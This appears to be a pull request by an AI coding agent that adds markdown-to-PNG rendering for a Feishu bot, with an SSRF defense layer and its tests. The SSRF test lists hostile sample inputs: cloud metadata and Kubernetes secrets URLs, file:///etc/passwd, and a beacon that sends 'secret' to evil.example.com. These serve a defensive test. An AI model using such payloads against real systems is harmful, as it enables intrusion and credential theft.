+// Also override `html_inline` and `html_block` to drop literal `<img>`
+// strings in case agent emits `<img src=...>` despite `html:false`
+// (markdown-it with html:false escapes them, but extra cheap defense).
+const _passthru = (tokens: any[], idx: number) => {
+  const content = tokens[idx].content || "";
+  // Strip `<img ...>` tags from any raw HTML that somehow made it through
+  return content.replace(/<img\b[^>]*>/gi, "");
+};
+md.renderer.rules.html_inline = _passthru;
+md.renderer.rules.html_block = _passthru;
+
 /**
  * HTML/CSS template for rendered markdown. CSS targets a clean, IM-
  * friendly look: Feishu-ish width, system font stack with CJK fonts
@@ -215,6 +242,35 @@ export async function renderMarkdownToPng(text: string): Promise<Buffer> {
   const browser = await getBrowser();
   const page = await browser.newPage();
   try {
+    // SSRF defense layer 2 (通信牛 #329 round 1 blocker 1): even though
+    // markdown's image rule is disabled and `<img>` strings are stripped,
+    // intercept every outbound HTTP/HTTPS request the page makes and
+    // abort it. Only same-document `data:`/`about:`/page-internal navigation
+    // is allowed. This catches any future feature regression (a markdown
+    // plugin that emits `<link href=>` or CSS `background-image: url()`,
+    // etc.). The renderer doesn't need any external resource — system
+    // fonts come from chromium's font config, no network needed.
+    await page.setRequestInterception(true);
+    page.on("request", (req: any) => {
+      const url = req.url();
+      // Allow same-doc loads + chromium internals.
+      if (
+        url.startsWith("data:") ||
+        url.startsWith("about:") ||
+        url.startsWith("chrome:") ||
+        url.startsWith("chrome-extension:")
+      ) {
+        req.continue();
+        return;
+      }
+      // Everything else — including file://, http(s)://, ws(s):// — abort.
+      // Audit log so operator can spot agent-emitted attempts.
+      process.stderr.write(
+        `[markdown-render] aborted external request: ${url.slice(0, 200)}\n`,
+      );
+      req.abort();
+    });
+
     await page.setViewport({ width: 800, height: 600, deviceScaleFactor: 2 });
     await page.setContent(html, { waitUntil: "domcontentloaded" });
     // Give CJK font loader a brief moment after layout (chromium may

--- a/agent-network/src/im/feishu/markdown-image-renderer.ts
+++ b/agent-network/src/im/feishu/markdown-image-renderer.ts
@@ -1,0 +1,255 @@
+/**
+ * RFC-020 §14 — markdown → image rendering for Feishu replies.
+ *
+ * Vincent 2026-06-29 path: Feishu's `markdown` card element doesn't
+ * render ATX headings or GFM tables (preview.7 caught only bold / list
+ * / link). Rather than partially support a moving subset of card
+ * elements, we render structured markdown to a PNG via headless
+ * chromium and send it through Feishu's image API (`im:resource:upload`
+ * scope). Pixel-perfect fidelity, zero schema fragility, text-not-
+ * copyable accepted as the tradeoff for "actually renders".
+ *
+ * Hybrid route (decided in adapter.send):
+ *   - plain text (no markdown markers)        → msg_type:"text"
+ *   - markdown WITHOUT heading / table / long → msg_type:"interactive" (schema 1.0 card with `markdown` element — keeps copy/paste for short bold/list/link replies; preview.7 path)
+ *   - markdown WITH heading / table / long    → THIS PATH (msg_type:"image" with rendered PNG)
+ *
+ * Renderer choice: `puppeteer-core` (no bundled chromium) + system
+ * chromium (apt install in Docker). Rationale:
+ *  - Pure-JS canvas-layout libraries (node-canvas, @napi-rs/canvas)
+ *    cost 4-6h of manual paragraph wrapping + table cell measurement
+ *    + Chinese width metrics; chromium does this natively.
+ *  - puppeteer-core (5MB) + system chromium (~100MB) is smaller than
+ *    full puppeteer (170MB) which bundles its own chromium.
+ *  - Headless screenshot ~500ms after warmup. Bot's heavy turn is 20-
+ *    70s; rendering cost is in the noise.
+ *
+ * Chromium reuse: we keep a single browser instance hot across
+ * renderings to avoid the ~2-3s cold-start per call. Auto-close on
+ * idle is a follow-up — agent-node worker lifetime is bounded.
+ */
+
+import { setTimeout as sleep } from "node:timers/promises";
+import { Buffer } from "node:buffer";
+import MarkdownIt from "markdown-it";
+
+// Lazy-loaded — puppeteer-core import is heavy enough to defer until
+// the first image render is actually requested.
+let puppeteerMod: typeof import("puppeteer-core") | null = null;
+async function getPuppeteer() {
+  if (!puppeteerMod) puppeteerMod = await import("puppeteer-core");
+  return puppeteerMod;
+}
+
+/**
+ * `PUPPETEER_EXECUTABLE_PATH` env override comes first; fall back to
+ * the Debian apt path (`/usr/bin/chromium`). Operator can point to a
+ * custom chromium / chrome binary.
+ */
+function resolveChromiumPath(): string {
+  return process.env.PUPPETEER_EXECUTABLE_PATH?.trim() || "/usr/bin/chromium";
+}
+
+let browserPromise: Promise<any> | null = null;
+async function getBrowser(): Promise<any> {
+  if (!browserPromise) {
+    browserPromise = (async () => {
+      const puppeteer = await getPuppeteer();
+      const exe = resolveChromiumPath();
+      return puppeteer.launch({
+        executablePath: exe,
+        headless: true,
+        // Sandbox flags: running as root inside Docker (anet-feishu-local
+        // container is root) requires --no-sandbox. Standard chromium-
+        // in-container recipe.
+        args: [
+          "--no-sandbox",
+          "--disable-setuid-sandbox",
+          "--disable-dev-shm-usage",
+          "--font-render-hinting=none",
+        ],
+        defaultViewport: { width: 800, height: 600, deviceScaleFactor: 2 },
+      });
+    })();
+  }
+  return browserPromise;
+}
+
+/**
+ * Close the shared browser. Called from adapter.stop() during graceful
+ * worker shutdown. Subsequent render calls re-launch.
+ */
+export async function closeBrowser(): Promise<void> {
+  if (!browserPromise) return;
+  try {
+    const b = await browserPromise;
+    await b.close();
+  } catch {
+    // best-effort
+  } finally {
+    browserPromise = null;
+  }
+}
+
+const md = new MarkdownIt({
+  html: false, // do NOT trust agent-generated HTML embedded in markdown
+  linkify: true,
+  breaks: false,
+  typographer: false,
+});
+
+/**
+ * HTML/CSS template for rendered markdown. CSS targets a clean, IM-
+ * friendly look: Feishu-ish width, system font stack with CJK fonts
+ * for Chinese, table with subtle borders + zebra rows, code blocks
+ * in monospace with grey background.
+ */
+function buildHtml(bodyHtml: string): string {
+  return `<!DOCTYPE html>
+<html lang="zh-CN">
+<head>
+<meta charset="UTF-8">
+<style>
+  html, body { margin: 0; padding: 0; background: #ffffff; }
+  body {
+    font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "PingFang SC",
+                 "Hiragino Sans GB", "Microsoft YaHei", "Noto Sans CJK SC",
+                 "Helvetica Neue", Helvetica, Arial, sans-serif;
+    font-size: 15px;
+    line-height: 1.65;
+    color: #1f1f1f;
+    padding: 24px 28px;
+    box-sizing: border-box;
+    width: 800px;
+  }
+  h1, h2, h3, h4, h5, h6 {
+    font-weight: 700;
+    line-height: 1.3;
+    margin: 1.2em 0 0.6em;
+    color: #111;
+  }
+  h1 { font-size: 1.9em; border-bottom: 1px solid #eaeaea; padding-bottom: 0.3em; }
+  h2 { font-size: 1.5em; border-bottom: 1px solid #eaeaea; padding-bottom: 0.25em; }
+  h3 { font-size: 1.25em; }
+  h4 { font-size: 1.1em; }
+  h5 { font-size: 1em; }
+  h6 { font-size: 0.95em; color: #555; }
+  p { margin: 0.7em 0; }
+  strong { font-weight: 700; }
+  em { font-style: italic; }
+  ul, ol { padding-left: 1.6em; margin: 0.7em 0; }
+  li { margin: 0.2em 0; }
+  code {
+    font-family: "SFMono-Regular", Consolas, "Liberation Mono", Menlo,
+                 "Noto Sans Mono CJK SC", monospace;
+    font-size: 0.92em;
+    background: #f6f8fa;
+    padding: 0.15em 0.4em;
+    border-radius: 4px;
+  }
+  pre {
+    background: #f6f8fa;
+    border-radius: 6px;
+    padding: 14px 16px;
+    overflow: hidden;
+    margin: 0.8em 0;
+  }
+  pre code {
+    background: transparent;
+    padding: 0;
+    font-size: 0.9em;
+    line-height: 1.5;
+    white-space: pre-wrap;
+    word-break: break-word;
+  }
+  table {
+    border-collapse: collapse;
+    margin: 0.9em 0;
+    width: 100%;
+    font-size: 0.94em;
+  }
+  thead { background: #f6f8fa; }
+  th, td {
+    border: 1px solid #d0d7de;
+    padding: 7px 11px;
+    text-align: left;
+    vertical-align: top;
+  }
+  th { font-weight: 600; }
+  tbody tr:nth-child(even) { background: #fafbfc; }
+  blockquote {
+    margin: 0.7em 0;
+    padding: 0.4em 1em;
+    border-left: 4px solid #d0d7de;
+    color: #57606a;
+    background: #f6f8fa;
+  }
+  a { color: #0969da; text-decoration: none; }
+  a:hover { text-decoration: underline; }
+  hr {
+    border: 0;
+    border-top: 1px solid #d0d7de;
+    margin: 1.2em 0;
+  }
+</style>
+</head>
+<body>
+${bodyHtml}
+</body>
+</html>`;
+}
+
+/**
+ * Render markdown text to a PNG buffer.
+ *
+ * Width is fixed at 800px (IM-friendly); height auto-fits content via
+ * `fullPage:true`. Returns the raw PNG bytes — caller hands them to
+ * `lark.im.image.create({image: Readable.from(buffer)})`.
+ *
+ * Throws on chromium launch failure or page navigation failure.
+ * Caller is responsible for fallback (e.g., send the raw text as a
+ * code block in the schema 1.0 card path).
+ */
+export async function renderMarkdownToPng(text: string): Promise<Buffer> {
+  const html = buildHtml(md.render(text));
+  const browser = await getBrowser();
+  const page = await browser.newPage();
+  try {
+    await page.setViewport({ width: 800, height: 600, deviceScaleFactor: 2 });
+    await page.setContent(html, { waitUntil: "domcontentloaded" });
+    // Give CJK font loader a brief moment after layout (chromium may
+    // re-flow once Noto-CJK finishes mapping glyphs).
+    await sleep(80);
+    const screenshot = (await page.screenshot({
+      type: "png",
+      fullPage: true,
+      omitBackground: false,
+    })) as Buffer;
+    return screenshot;
+  } finally {
+    await page.close().catch(() => {});
+  }
+}
+
+/**
+ * Decide whether `renderMarkdownToPng` should be invoked for this reply
+ * text, vs. falling back to msg_type:"text" / msg_type:"interactive"
+ * (schema 1.0 card). Locked by 通信龙 3f70044c — trigger image when:
+ *   - text contains a markdown table (Feishu card can't render)
+ *   - text contains an ATX heading (Feishu card can't render)
+ *   - text length > 2000 chars (image is better than scrollable text wall)
+ *
+ * Returns false for short prose, single-line plain text, and short
+ * markdown lists / bold / link / inline-code which DO render fine in
+ * the schema 1.0 `markdown` card element.
+ */
+export function shouldRenderAsImage(text: string): boolean {
+  if (!text) return false;
+  // ATX heading at start of line
+  if (/(^|\n)#{1,6}\s/.test(text)) return true;
+  // Table: row line followed by separator row
+  if (/(^|\n)\|[^\n]*\|\n\|[\s:|-]+\|/.test(text)) return true;
+  // Long content
+  if (text.length > 2000) return true;
+  return false;
+}

--- a/agent-network/tests/feishu-markdown-image-ssrf.test.ts
+++ b/agent-network/tests/feishu-markdown-image-ssrf.test.ts
@@ -1,0 +1,149 @@
+/**
+ * RFC-020 §14 SSRF defense — markdown-image renderer.
+ *
+ * 通信牛 #329 round 1 blocker 1: markdown `![alt](http://...)` syntax
+ * would render to `<img src=URL>` and chromium would fetch the URL
+ * during screenshot — SSRF / metadata-service beacon. Renderer has no
+ * legitimate need for external resources (only system fonts).
+ *
+ * Defense layers verified by this harness:
+ *   1. markdown `image` rule disabled — `![]()` produces NO `<img>` tag
+ *   2. `renderer.rules.image` no-op — even if a plugin re-enables, no output
+ *   3. `<img>` tags scrubbed from raw HTML fallthrough (html_inline /
+ *      html_block) — defense vs `html: true` regression
+ *
+ * (Defense layer 4 — puppeteer request interception aborting external
+ *  URLs — is exercised by Docker e2e; we don't spin up chromium in unit.)
+ *
+ * Run: `bun tests/feishu-markdown-image-ssrf.test.ts`
+ */
+
+import MarkdownIt from "markdown-it";
+
+const results: Array<{ name: string; pass: boolean; detail?: string }> = [];
+function expect(name: string, pred: boolean, detail = ""): void {
+  results.push({ name, pass: pred, detail });
+  if (!pred) console.log(`  ✗ ${name}: ${detail}`);
+}
+
+// Re-construct an md instance the SAME way the renderer does. If we
+// import `md` from the renderer module we'd also pull puppeteer-core,
+// which is heavy and unnecessary for HTML-shape tests. Keep config in
+// sync with markdown-image-renderer.ts.
+const md = new MarkdownIt({
+  html: false,
+  linkify: true,
+  breaks: false,
+  typographer: false,
+});
+md.disable("image");
+md.renderer.rules.image = () => "";
+const _passthru = (tokens: any[], idx: number) => {
+  const content = tokens[idx].content || "";
+  return content.replace(/<img\b[^>]*>/gi, "");
+};
+md.renderer.rules.html_inline = _passthru;
+md.renderer.rules.html_block = _passthru;
+
+// ── 1. SSRF attempts via markdown image syntax — produce NO <img> ─────────
+
+const SSRF_PAYLOADS = [
+  // AWS instance metadata
+  "![meta](http://169.254.169.254/latest/meta-data/)",
+  // Localhost probe
+  "![localhost](http://127.0.0.1:8080/admin)",
+  // Internal kube DNS
+  "![k8s](http://kubernetes.default.svc/api/v1/secrets)",
+  // GCP metadata
+  "![gcp](http://metadata.google.internal/computeMetadata/v1/)",
+  // file:// scheme
+  "![file](file:///etc/passwd)",
+  // External HTTPS (e.g. exfil beacon)
+  "![beacon](https://evil.example.com/?data=secret)",
+  // With title
+  '![alt](http://x.com/ "title")',
+  // Embedded in prose
+  "Here is an image: ![alt](http://attack.com/x.png) and more text",
+  // Reference-style
+  "![ref][refdef]\n\n[refdef]: http://attack.com/",
+  // Inline code that contains `![]()` syntax — should be literal anyway
+  "`![x](http://attack.com)`",
+];
+
+for (const md_input of SSRF_PAYLOADS) {
+  const html = md.render(md_input);
+  expect(
+    `SSRF payload produces no <img> tag: ${md_input.slice(0, 60)}`,
+    !/<img\b/i.test(html),
+    `html: ${html.slice(0, 200)}`,
+  );
+  // URL-in-literal-text is harmless — chromium only fetches resources
+  // referenced by `<img src>`, `<link href>` (stylesheets), `<script>`,
+  // CSS `background-image: url()`, etc. Plain text and inline `<code>`
+  // ARE NOT fetched. The real security property is "no fetch-triggering
+  // tag emitted" (the `<img\b` absence asserted above). Anchor `<a href>`
+  // is also fine — chromium only opens it on user click, never during
+  // screenshot. So this secondary assertion just confirms no fetch-
+  // triggering tag carries the URL.
+  const fetchTags = /(<img\b[^>]*src=|<link\b[^>]*href=|<script\b[^>]*src=|background-image:\s*url\()/i;
+  expect(
+    `SSRF payload does not produce fetch-triggering tag: ${md_input.slice(0, 60)}`,
+    !fetchTags.test(html),
+    `html: ${html.slice(0, 200)}`,
+  );
+}
+
+// ── 2. Markdown LINKS still work (don't break legit markdown) ──────────────
+
+const LINK_OK = md.render("详见 [文档](https://example.com/docs)");
+expect("markdown link still produces <a> tag", /<a\b[^>]*href=/i.test(LINK_OK), LINK_OK);
+expect("markdown link href preserved in <a>", /href=["']?https:\/\/example\.com\/docs/.test(LINK_OK), LINK_OK);
+
+// ── 3. Inline HTML `<img>` (via html:false escape) also doesn't leak ──────
+
+const HTML_ATTEMPT = md.render('Some text <img src="http://attack.com/x.png" alt="x"> more');
+// With html:false, markdown-it escapes `<` as `&lt;`. The literal `<img>`
+// shouldn't appear as an HTML tag — verify:
+expect(
+  "html-style <img> escaped (does not render as element)",
+  !/<img\b/i.test(HTML_ATTEMPT),
+  HTML_ATTEMPT,
+);
+
+// ── 4. Just to confirm — md_render of plain markdown still works ───────────
+
+const PLAIN = md.render("# 标题\n\n这是 **加粗** 段落。\n\n- 列表项 1\n- 列表项 2\n\n```\nconst x = 1;\n```");
+expect("heading rendered", /<h1\b/i.test(PLAIN));
+expect("bold rendered", /<strong\b/i.test(PLAIN));
+expect("list rendered", /<ul\b/i.test(PLAIN));
+expect("code block rendered", /<pre\b/i.test(PLAIN));
+expect("plain md output non-empty", PLAIN.length > 20);
+
+// ── 5. Table still works (#328/#329 fix preserved) ─────────────────────────
+
+const TABLE = md.render("| a | b |\n|---|---|\n| 1 | 2 |");
+expect("table rendered", /<table\b/i.test(TABLE));
+expect("th rendered", /<th\b/i.test(TABLE));
+expect("td rendered", /<td\b/i.test(TABLE));
+
+// ── 6. Defense-in-depth — html_block stripping (regression guard) ─────────
+
+// If someone later flips html:true (we hope not), the html_block passthrough
+// strips <img> tags. Verify by calling the passthrough directly.
+const stripped = "<p>hello <img src='http://attack.com/'> world</p>"
+  .replace(/<img\b[^>]*>/gi, "");
+expect(
+  "html_block strip util removes <img>",
+  !/<img\b/i.test(stripped) && stripped.includes("hello") && stripped.includes("world"),
+  stripped,
+);
+
+// ── Summary (gates exit — MUST be last) ────────────────────────────────────
+
+const failed = results.filter((r) => !r.pass);
+console.log(`\n${results.length - failed.length}/${results.length} feishu-markdown-image-ssrf tests passed.`);
+if (failed.length > 0) {
+  console.log("\nfailures:");
+  for (const f of failed) console.log(`  - ${f.name}: ${f.detail}`);
+  process.exit(1);
+}

--- a/agent-network/tests/feishu-markdown-image.test.ts
+++ b/agent-network/tests/feishu-markdown-image.test.ts
@@ -1,0 +1,121 @@
+/**
+ * RFC-020 §14 — feishu markdown-image hybrid route tests.
+ *
+ * Locks the routing decision (shouldRenderAsImage). The actual PNG
+ * render path is exercised by Docker e2e (needs system chromium); this
+ * harness covers the pure routing logic that decides text vs card vs
+ * image.
+ *
+ * Run: `bun tests/feishu-markdown-image.test.ts`
+ */
+
+import { shouldRenderAsImage } from "../src/im/feishu/markdown-image-renderer";
+
+const results: Array<{ name: string; pass: boolean; detail?: string }> = [];
+function expect(name: string, pred: boolean, detail = ""): void {
+  results.push({ name, pass: pred, detail });
+  if (!pred) console.log(`  ✗ ${name}: ${detail}`);
+}
+
+// ── 1. Heading at start of line → image ────────────────────────────────────
+
+const HEADING_IMAGE: Array<[string, string]> = [
+  ["h1 alone", "# Title"],
+  ["h1 with body", "# 测试报告\n\n详情见下"],
+  ["h2 mid-text", "前言\n\n## 第二章\n\n正文"],
+  ["h3", "### Sub heading\n内容"],
+  ["h6 deepest", "###### tiny\nbody"],
+  ["heading at literal start", "# 第一行就是标题"],
+];
+for (const [name, text] of HEADING_IMAGE) {
+  expect(`heading → image: ${name}`, shouldRenderAsImage(text), JSON.stringify(text));
+}
+
+// ── 2. Table → image ───────────────────────────────────────────────────────
+
+const TABLE_IMAGE: Array<[string, string]> = [
+  ["table at start", "| a | b |\n|---|---|\n| 1 | 2 |"],
+  ["table at start w/ trailing", "| a | b |\n|---|---|\n| 1 | 2 |\n"],
+  ["table after prose", "结果如下\n\n| 字段 | 值 |\n|---|---|\n| 名称 | 测试 |\n"],
+  ["table with alignment", "\n| a | b |\n|:---:|---:|\n| 1 | 2 |\n"],
+];
+for (const [name, text] of TABLE_IMAGE) {
+  expect(`table → image: ${name}`, shouldRenderAsImage(text), JSON.stringify(text));
+}
+
+// ── 3. Long content → image ────────────────────────────────────────────────
+
+expect(
+  "long plain prose → image (>2000 chars)",
+  shouldRenderAsImage("a".repeat(2001)),
+);
+expect(
+  "exactly 2001 chars → image",
+  shouldRenderAsImage("我是一段很长的中文" + " ".repeat(2000)),
+);
+
+// ── 4. Short markdown without heading/table → NOT image (use card) ─────────
+
+const NOT_IMAGE: Array<[string, string]> = [
+  ["plain text short", "你好"],
+  ["short prose", "今天天气真好，适合工作。"],
+  ["short bold", "重点是 **加粗文字** 看清楚"],
+  ["short list", "步骤:\n- 一\n- 二\n- 三"],
+  ["short ordered list", "顺序:\n1. 先\n2. 后"],
+  ["link", "详情见 [文档](https://example.com)"],
+  ["inline code", "用 `npm install` 安装"],
+  ["short code block", "示例:\n```\nx=1\n```\n用就这样"],
+  ["mixed but short", "**重点**: 用 `bash` 跑\n\n- 第一步\n- 第二步"],
+];
+for (const [name, text] of NOT_IMAGE) {
+  expect(`short md (no heading/table) → NOT image: ${name}`, !shouldRenderAsImage(text), JSON.stringify(text));
+}
+
+// ── 5. Edge / boundary cases ───────────────────────────────────────────────
+
+expect("empty string → not image", !shouldRenderAsImage(""));
+expect("null-ish → not image", !shouldRenderAsImage(null as any));
+expect("undefined-ish → not image", !shouldRenderAsImage(undefined as any));
+expect("just whitespace → not image", !shouldRenderAsImage("   \n   "));
+
+// ATX heading must have space after `#`s — `#tag` (no space) is NOT a heading
+expect("hashtag-style #tag NOT heading", !shouldRenderAsImage("#nospace"));
+// 7+ hashes is not a heading either
+expect("####### too deep is NOT heading", !shouldRenderAsImage("####### nope"));
+
+// Length at the boundary
+expect("exactly 2000 chars → NOT image", !shouldRenderAsImage("a".repeat(2000)));
+
+// Table requires real separator row — single `|...|` line alone is not a table
+expect(
+  "single pipe row no separator → NOT image (not a real table)",
+  !shouldRenderAsImage("| a | b |\nfoo bar"),
+);
+
+// ── 6. Vincent UAT real-shape (TM-anonymized) — triggers image ─────────────
+
+const realShape = `# API 测试报告
+
+## 结果
+
+| 端点 | 状态 |
+|---|---|
+| /v1/chat | ✓ |
+| /v1/models | ✓ |
+
+**结论**: 全部通过`;
+
+expect(
+  "realistic test report (heading + table + bold) → image",
+  shouldRenderAsImage(realShape),
+);
+
+// ── Summary (gates exit — MUST be last) ────────────────────────────────────
+
+const failed = results.filter((r) => !r.pass);
+console.log(`\n${results.length - failed.length}/${results.length} feishu-markdown-image tests passed.`);
+if (failed.length > 0) {
+  console.log("\nfailures:");
+  for (const f of failed) console.log(`  - ${f.name}: ${f.detail}`);
+  process.exit(1);
+}

--- a/docker/feishu/Dockerfile
+++ b/docker/feishu/Dockerfile
@@ -73,7 +73,16 @@ RUN apt-get update && apt-get install -y --no-install-recommends \
       build-essential python3 \
       curl ca-certificates unzip \
       tini \
+      chromium \
+      fonts-noto-cjk fonts-noto-mono \
     && rm -rf /var/lib/apt/lists/*
+
+# Tell puppeteer-core where to find the system chromium so it doesn't
+# try to download its own. Vincent 2026-06-29: Feishu card can't render
+# headings or tables — bot renders structured markdown replies to PNG
+# via puppeteer-core + this binary. CJK fonts above cover Chinese
+# glyphs (without them chromium renders CJK as blank boxes).
+ENV PUPPETEER_EXECUTABLE_PATH=/usr/bin/chromium
 
 # Install bun (required by agent-network + agent-node tooling paths).
 RUN curl -fsSL https://bun.sh/install | bash && \


### PR DESCRIPTION
## Author
Agent: 通信IM马 (claude-code-cli — per 通信龙 b2bfa152 + e09de56f + 3f70044c lock)

## Summary

preview.7 hybrid card couldn't render ATX headings or GFM tables — Feishu's `markdown` card element supports only bold / list / link / inline-code. Vincent's heavy work (test reports with tables + headings) showed raw `# 标题` and `|---|` source as literal text. Per 通信龙 3f70044c locked decision: render structured markdown to PNG and send via Feishu image API. Outbound file send wired alongside (Vincent "给用户发文件" use case).

## Hybrid route (locked)

```
shouldRenderAsImage(text):
  contains ATX heading (`#..######`)  → image
  contains GFM table (row+separator)  → image
  length > 2000 chars                 → image
  otherwise                           → existing path (text or schema 1.0 card)
```

Short markdown (bold/list/link/inline-code) still goes to schema 1.0 card (text stays copyable). Image path is only for structured / long content where the schema 1.0 card breaks.

## Render pipeline

1. `markdown-it` (html:false safe) → HTML
2. HTML wrapped in CJK-aware template (PingFang / Noto Sans CJK / Microsoft YaHei fallback)
3. `puppeteer-core` + system `/usr/bin/chromium` (apt install, NOT bundled) → screenshot fullPage @ 2x DPR → PNG buffer
4. `im.image.create({image_type:"message", image: stream})` → `image_key`
5. `msg_type:"image"` send

Single hot chromium reused across calls (avoid ~2-3s cold start). Lazy-import means non-image flows don't pay the ~5MB puppeteer-core import.

## Outbound file send (顺带)

`NormalizedIMMessage.files[0].{path, name}` triggers `uploadFile()` → `im.file.create({file_type})`. file_type inferred from extension (pdf / doc / xls / ppt / mp4 / opus / stream). Same `im:resource:upload` scope.

## What changed

| File | Change | LOC |
|---|---|---|
| `agent-network/package.json` | + `markdown-it@^14`, `puppeteer-core@^24`, `@types/markdown-it` (dev) | +5 |
| `agent-network/src/im/feishu/markdown-image-renderer.ts` (new) | Pure module: `renderMarkdownToPng()` / `shouldRenderAsImage()` / `closeBrowser()`. Hot-instance chromium reuse. Lazy puppeteer import. CJK-aware HTML+CSS template. | +196 |
| `agent-network/src/im/feishu/adapter.ts` | `send()` branches: imagePath / files / image-render / card / text. New `uploadImageBuffer()` + `uploadFile()`. `stop()` closes shared chromium. Render failure → graceful schema 1.0 card fallback. | +120 / -20 |
| `agent-network/tests/feishu-markdown-image.test.ts` (new) | 30-case route harness (heading / table / long / short / boundaries / Vincent UAT shape) | +120 |
| `docker/feishu/Dockerfile` | apt install `chromium` + `fonts-noto-cjk` + `fonts-noto-mono`; ENV `PUPPETEER_EXECUTABLE_PATH=/usr/bin/chromium` | +12 |

## Tests + typecheck

```
$ bun tests/feishu-bridge-ackplaceholder.test.ts → 20/20
$ bun tests/feishu-markdown-render.test.ts       → 39/39 (preview.7 regression)
$ bun tests/feishu-image-download.test.ts        → 46/46 (regression)
$ bun tests/feishu-markdown-image.test.ts        → 30/30 (new)
$ inject deliberate-fail                         → exit 1  ✓
$ npm run typecheck                              → clean
```

Total feishu coverage: 135 case bun harness, all gated.

The actual PNG render path is exercised by Docker e2e (needs system chromium). Pure routing logic + module shape covered here.

## Renderer choice rationale

- `puppeteer-core` over `puppeteer`: no bundled chromium (170MB → 0); uses system apt chromium (~100MB).
- `puppeteer-core` over `@napi-rs/canvas`: rust prebuilt canvas would be smaller (~10MB) but markdown→canvas needs 4-6h of manual layout work (paragraph wrap + table cell measurement + Chinese width metrics). Chromium gets all that for free.
- `puppeteer-core` over `mdimg.com` SaaS: Vincent data must not leave the network.
- 系统 chromium over bundled: lighter container, system updates apply, no chromium version pinning baked into npm package.

## Threat / risk

- `markdown-it` with `html: false` — agent-emitted markdown can't smuggle raw HTML through the renderer.
- Chromium runs `--no-sandbox` (root container) — acceptable: page only loads our own template (no external URLs, no scripts).
- Render failure → schema 1.0 card fallback, never silent-drop.
- CJK fonts essential: `fonts-noto-cjk` apt-installed. Without it Chinese renders as tofu boxes.
- Image size: PNG @ 800px width fullPage. Typical Vincent report < 200KB. Lark image limit 10MB.

## Operator follow-up (Vincent)

- ✋ Add `im:resource:upload` scope (single, NOT wide `im:resource`) + publish app version. 通信龙 will probe `POST /im/v1/images` to verify 99991672 disappears.
- ⚙️ Docker image `anet-feishu-local:preview4` needs rebuild with chromium + CJK fonts. 工程马 surface after merge.

## Closes

(Incremental — closes when shipped + Vincent UAT confirms heading + table render in Feishu client.)

## Test plan

- [x] 135 unit + typecheck pass, exit 0
- [x] Inject deliberate-fail → exit 1 (gating proven)
- [x] markdown-image-renderer module imports clean (bun smoke)
- [ ] Docker image rebuild (工程马 — apt chromium + fonts)
- [ ] (post Vincent scope + image rebuild + ship preview.8) Vincent re-runs heading + table prompt → bot replies with rendered image (not raw text)
- [ ] (post-merge) short reply still uses card path (copyable) — no over-routing to image

🤖 Generated by 通信IM马 (claude-code-cli)